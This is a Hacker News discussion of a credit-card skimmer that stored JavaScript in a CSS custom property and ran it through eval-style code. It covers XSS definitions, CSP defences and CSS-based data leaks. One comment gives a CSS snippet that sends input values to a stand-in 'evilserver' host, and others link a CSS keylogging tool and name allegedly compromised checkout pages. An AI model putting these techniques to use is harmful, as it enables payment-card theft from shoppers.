12 ms·
Hackers hide web skimmer inside a website's CSS
- lucideer 6y agoThis is a article is a non-story, turned into a story by (what must be deliberate) misinformation. Wary as I am to attribute to malice what can be explained by incompetent journalism, the fact that Sanguine Security are mentioned by name in the article, and their website directly linked to, makes me think this must be a paid marketing piece. The article also seems to imply that Willem de Groot is the person describing this "feature" as a modern addition to the CSS spec (it isn't any such thing). There is no such feature, this attack uses JS eval normally and does not rely on anything special in CSS the language. There isn't anywhere near enough novelty here to describe this as anything distinct from any other old-fashioned XSS. Flagged.
- deleted 6y ago[deleted]
- campuscodi 6y agoFixed. Thanks.
- lucideer 6y agoNot sure I follow. What's fixed?
- strictnein 6y agoAs someone who knows Willem and actually worked with him on finding how that weird CSS was being utilized/exploited I can say with 100% certainty that this is not a paid marketing piece. And, just to clarify, by "work with him" I mean that he hit me up and we chatted while looking at the code and I suggested that some other code might be just using CSS as a storage place, not that I was paid or have ever been paid by him. edit: anything distinct from any other old-fashioned XSS. This isn't XSS in any way, shape, or form.
- lucideer 6y agoCan you explain to me what this is if not XSS? The article does a poor job. My assessment of this as marketing is going on the content of the article which attributes obvious misinformation to Sanguine Security; if it is not the case, I'd recommend Willem request a retraction/correction/clarification.
- strictnein 6y agoXSS doesn't involve someone compromising an online store's systems or adding code to pages through normal administrative functions. XSS mainly takes two forms: Non-persisted / reflected is the most common: An example of this: A webpage has a vulnerable URL parameter that doesn't sanitize the data. ex: http://example.com/?username=<data> http://example.com/?username=<data> Instead of removing HTML/etc from that username parameter, it just writes it to the page, so I can then send you a malicious link for a site that you're familiar with and get the code to execute in your browser. Stored/Persistent: Example: a social media site. If it didn't properly sanitize your posts, you could store malicious code as part of one of your posts and then anyone who saw that post would execute your code. Now, if you were clever, you would then make a post using their account and have it propagate your XSS and now you've created an XSS worm.
- lucideer 6y agoWhat I asked for is an explanation of the specific exploit described in the article, and what makes it distinct from XSS. The article is missing a lot of technical detail on the mechanism, so it's not entirely clear what these distinctions might be. Your comment makes no mention of the specifics in the article and you've instead given me a (rather patronising) generic definition of XSS. I know what XSS is, and the mechanisms of compromise in its various forms. What I don't know is the detail of how this specific exploit is different.
- chrisacky 6y agoWhy on earth can CSS load JS. Is this an oversight or does --javascript actually exist for this exact purpose. I cannot find any details on this in any spec or rfc etc.
- 0x0 6y agoIt looks like `--script` is just an arbitrary string, it is only executed because a real `<script>` tag retrieves the property and evals it through `(new Function())()? https://twitter.com/sansecio/status/1336614850047381506/photo/2 https://twitter.com/sansecio/status/1336614850047381506/phot...
- mrtksn 6y agoWhy there's "new Function()" that looks for CSS computed styles with "--script"? Is this some pattern with a popular JS framework?
- bawolff 6y agoNew Function() is just another name for eval(). It has nothing specificly to do with css.
- mrtksn 6y agoOkay but what is the purpose of this code? why would you eval() CSS?
- ryanlol 6y agoThe purpose of the code is to steal credit cards. > why would you eval() CSS? It’s really as simple as “because you can”. This is just an obfuscation technique.
- mrtksn 6y agoFrom my understanding, the code that the devs wrote is not to steal credit cards but to create some UI, however they do it in such a way that JS hidden in CSS that would normally won't run. gets run and which results in credit cards being stolen.
- SahAssar 6y agoA good Content-Security-Policy that did not allow unsafe-eval would have worked to protect against this. Puzzling that ecommerce sites have not set up proper CSP on their checkouts.
- bawolff 6y agoIf someone can insert an eval() in your website, the battle is lost and they can do other evil things. Sure it defeats this one particular obfuscation method, but the ship has already sunk at that point (To be clear, not dissing on CSP, its great, but it can't stop all attacks) Now if script-src CSP prevented the script tag part of this attack, that would be a good thing CSP can potentially do (depending on what type of access attacker had).
- atoav 6y agoWhich is why I usually writw the CSS completely myself (at max reusing my own css cose). I want to know the things I built, both for security and in case something doesn't work.
- SahAssar 6y agoYeah, it's not just unsafe-eval that needs to be blocked, I just said that that was the specific feature that would have blocked this. A good CSP would have protected against most injection attacks though (as long as the JS files have not been modified).
- jeroenhd 6y agoYou're right if this was some included third party script, but usually these hacks involve an attacker getting access to the (PHP/HTML) source code and injecting stuff directly. At that point there's very little you can do to prevent JS files from being changed or the CSP being disabled at all. Very few web store systems rely on statically generated HTML pages, and the ones that do usually have some JS file for animations or functionality that the attacker can also modify. CSP is great for blocking XSS and other such attacks, but I don't think it can be an effective defence in this particular attack. The only way I can think of to get CSP to protect you is to host no JS on the server itself, configure some kind of proxy (Cloudflare?) and inject CSP config there. An attacker could still compromise the website but they'd need to escalate their attack to the point of a DNS takeover or add a noticeable redirect to an attacker-controlled skimming page, both of which aren't very likely to be used against random targets like these web shops often are.
- croes 6y agoThat's first time I heard CSS is allowed to load and run. WTF
- bstasse 6y agoAs mentioned in other comments, CSS does not run scripts. In this case, it is just used to store the content of a script as a string in a custom property, which is then retrieved by another script, and run.
- oriesdan 6y agoAnd for people often saying it's a solution in search of a problem : that's why we need cryptocurrencies. At least, the ones that could be used as actual currencies. It would be so much better if I could click a payment link that opens an external wallet software like "mailto:" links, verify the amount it proposes to transfer, and click "send" to send the money at the prefilled address instead of allowing someone to take it. I really hope that one day, we'll tell our grandkids about that time where we were giving secret codes on the internet and anyone having them could take money on our account as they wish, and those kids will think we're delirious.
- eznzt 6y agoIf you get your card skimmed you can call your bank and have your money bank. If they steal your crypto it's buh-bye.
- delusional 6y agoHow is any of that not possible with regular money and a regular bank? It's already how MobilePay works in Denmark. You give the website your phone number, and a prompt pops up on your phone screen to approve the transfer, with an amount, in a native (trusted) app. Crypto doesn't add anything here.
- oriesdan 6y agoGood for Denmark, it doesn't exist here. Plus, there is no way I will install a proprietary banking app. For this to be acceptable, it needs to be a standard and have multiple implementations. At which point, using cryptocurrencies is the easiest way.
- unilynx 6y agoRemember that scripting in CSS actually used to be a thing - IE used to have 'behavior' and 'expression' properties that would load external scripting code or execute inline JavaScript. 'behavior' was commonly used to fix some PNG-transparancy issues in early IE versions (pngfix.htc) and 'expression' was a much more powerful (and dangerous) version of current 'calc'.
- blindm 6y agoYes I remember people coding their whole website using expression()
- vbezhenar 6y agoThere’s an interesting technique to spy for key presses. Basically you have to use a custom font where each character loads from a different font URL. Browser will issue corresponding requests as you press your buttons. It won’t detect identical characters but it might steal enough to brute force the rest. And it works with no JS.
- bamboleo 6y agoThat’s what I thought this method was. Repeating characters would kill that method since you don’t know which character was repeated and, more importantly, where. Even in the best situation you have to guess 4 digits and their positions 1 through 16. That sounds like a lot of guessing.
- vbezhenar 6y agoYes, not ideal. But may be someone might develop even better methods. Imagine something like input[value~="12"] { background-image: url(http://evilserver/12); } input[value~="13"] { background-image: url(http://evilserver/13); } It's just a rough idea, but there are numerous methods to dynamically leak information through CSS.
- bamboleo 6y agoPeople are missing the point of the story (and the title doesn’t help) CSS here is only used to hide the URL from security checkers, but a JavaScript part is still needed. CSS alone can’t run scripts nor send the content of an input field.
- KMnO4 6y agoCSS indeed can send the content of an input field [0], but it’s way too much of a hassle to be used in the wild. [0]: https://github.com/maxchehab/CSS-Keylogging https://github.com/maxchehab/CSS-Keylogging
- emmab 6y ago> but it’s way too much of a hassle to be used in the wild. No it's not, it's just rare that you'd have the ability to inject CSS but not JS. A core skill of hacking is being able to see through the things people would normally see as "hassle" or "friction" to the reductionist "what keys do I have to press on the machine in what order to make this happen".
- bamboleo 6y agoNo it cannot. That method misses repeating characters, which makes it pretty useless unless your password is otherwise guessable. Also you have to hope that the order is right. For credit card numbers that means that you’ll miss at least 4 digits and you won’t know their position among 16. I’m not gonna do the math but that’s a few times more than 10000 guesses necessary to find the final number.
- detaro 6y agoThe article was edited, it did earlier claim that there was a CSS feature to include JS code.
- calibas 6y agoI assume it's a script that searches the CSS files for any JS and runs eval()? Yeah, the problem isn't CSS, them problem is whoever thought that was a good idea. Now XSS is a "feature" of CSS.
- blindm 6y agoMost of the CC deets ripped from online stores are hard to use with the presence of 3-D Secure[0]. I imagine the deets are collected in aggregate and then sold in darknet e-crime markets for a high price (Sold on because most of the deets are useless and unusable) [0] https://en.wikipedia.org/wiki/3-D_Secure https://en.wikipedia.org/wiki/3-D_Secure
- strictnein 6y agoThe cards stolen this way are mostly sold individually for $10-$20 a piece. You can search those marketplaces like any other store: "I want a Visa card from a guy in Florida".
- dbielik 6y agoStill at least two sites [1] actively exploited on https://www.newbalance.com.hk/zh/checkout/cart/ https://www.newbalance.com.hk/zh/checkout/cart/ and https://www.clear4vision.com/checkout/cart/ https://www.clear4vision.com/checkout/cart/ if you view-source [1]: https://www.nerdydata.com/reports/cloud-iq-net/b9f4d0cc-a686-4d7d-8ca1-c48aa6fd4b77 https://www.nerdydata.com/reports/cloud-iq-net/b9f4d0cc-a686...
- deleted 6y ago[deleted]
- deleted 6y ago[deleted]
- deleted 6y ago[deleted]
- frongpik 6y agoThis is why I'm ok to stop updating browsers and risk getting pwned just to keep uBO. It's a lot more likely that I'll get pwned by a fishy script distributed by an ads network than by a buffer overflow bug in a font renderer. Especially if uBO blocks custom fonts by default.
- deleted 6y ago[deleted]
- thro1 6y agoDupe: https://news.ycombinator.com/item?id=25364140 https://news.ycombinator.com/item?id=25364140